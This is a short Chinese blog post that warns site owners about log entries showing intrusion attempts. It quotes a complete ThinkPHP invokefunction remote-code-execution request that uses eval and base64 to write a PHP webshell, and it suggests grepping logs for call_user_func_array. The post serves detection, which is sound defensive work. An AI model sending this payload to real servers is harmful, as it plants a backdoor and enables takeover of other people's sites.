首页 > 其他分享 >如果在日志中发现以下内容,则证明有人尝试入侵你的网站

如果在日志中发现以下内容,则证明有人尝试入侵你的网站

时间:2022-09-30 12:24:08浏览次数:66  
标签:尝试 vars 以下内容 base64 decode call 日志 array

1 ?s=index/think\\app/invokefunction
2 &function=call_user_func_array
3 &vars[0]=assert
4 &vars[1][]=@eval($_GET[%27fuck%27]);
5 &fuck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz54YnNoZWxs));

 

这是在我的网站日志中发现的,看上去应该是基于php框架 -think 漏洞操作的,但我压根就没用thinkphp;

大家可以通过查找关键词,比如  搜索日志中包含 call_user_func_array   ,的行;

如果你不太确定有没有入侵成功,可以自己拿着参数试一下 .

标签:尝试,vars,以下内容,base64,decode,call,日志,array
From: https://www.cnblogs.com/008ts/p/16744506.html

相关文章

  • linux切割日志文件的shell脚本
    #!/bin/bash#获取前一天的日期suffix=`date-d"-1day""+%Y%m%d"`#split命令用于切割文件#-bSIZE:SIZEisanintegerandoptionalunit(example:10Mis10*102......
  • 日志框架的介绍及使用
    在web项目中,很多时候会用到日志管理工具。日志工具有很多,应用程序这个框架用这个,另外一个框架用另外一个日志。配置日志就很麻烦。SLF4J这个工具提供一个接口,用来管理日志......
  • Taurus.MVC 微服务框架 入门开发教程:项目集成:5、统一的日志管理。
    系列目录:本系列分为项目集成、项目部署、架构演进三个方向,后续会根据情况调整文章目录。开源地址:​​https://github.com/cyq1162/Taurus.MVC​​本系列第一篇:​​Taurus.MV......
  • IDEA打印gc日志
    IDEA打印gc日志在研究Java的虚拟机的相关知识的时候,有时候需要设置gc相关,设置gc有如下几种方式。1.*方式一点击EditConfigurations,对特定程序进行设置:这样当代码调......
  • ELK收集交换机日志
    1、交换机配置#华三的命令举例info-centerloghost10.88.35.21port5003#elk的IP根据环境调整2、logstash配置2.1关闭服务和修改用户权限#关闭rsyslog服务,因为这个会......
  • 你的 Kibana 老崩么?有定时删除日志么?ELK 里 Kibana、ElasticSearch 还是 Logstash 的
    ELK系统中访问报错Kibana报错:{“statusCode“:500,“error"/InternalServerError","message":”[parent]Datatoolarge,datafor[<http_request>]wouldbe[99......
  • mysql8日志占满磁盘解决办法
    SHOWBINARYLOGS;setglobalbinlog_expire_logs_seconds=60*60*24;showvariableslike'%expire%';flushprivileges;永久改动可以找到/etc/mysql/my.cnf(Ubunt......
  • Go 使用 zap 日志库
    1.前言zap是我个人比较喜欢的日志库,是uber开源的,有较好的性能。很多开源Go项目都使用它作为日志组件。2.安装使用安装goget-ugo.uber.org/zap快速入门logg......
  • log4net 日期和文件大小滚动Composite模式 删除自定义几天前的日志
    官方配置信息Apachelog4net–Apachelog4net:ConfigExamples-Apachelog4net官方示例实现RollingFileAppenderlogging-log4net/DerivedAppender.csat3f2b3......
  • K8S服务轻松对接EFK日志系统
    前言在不断更新和进步的的网络时代,相应的各种开发技术都有了较高层次的提升。现在比较流行的是容器集群管理平台(比较出名的是kubernetes),在平台上运行着不同编程语言产出的......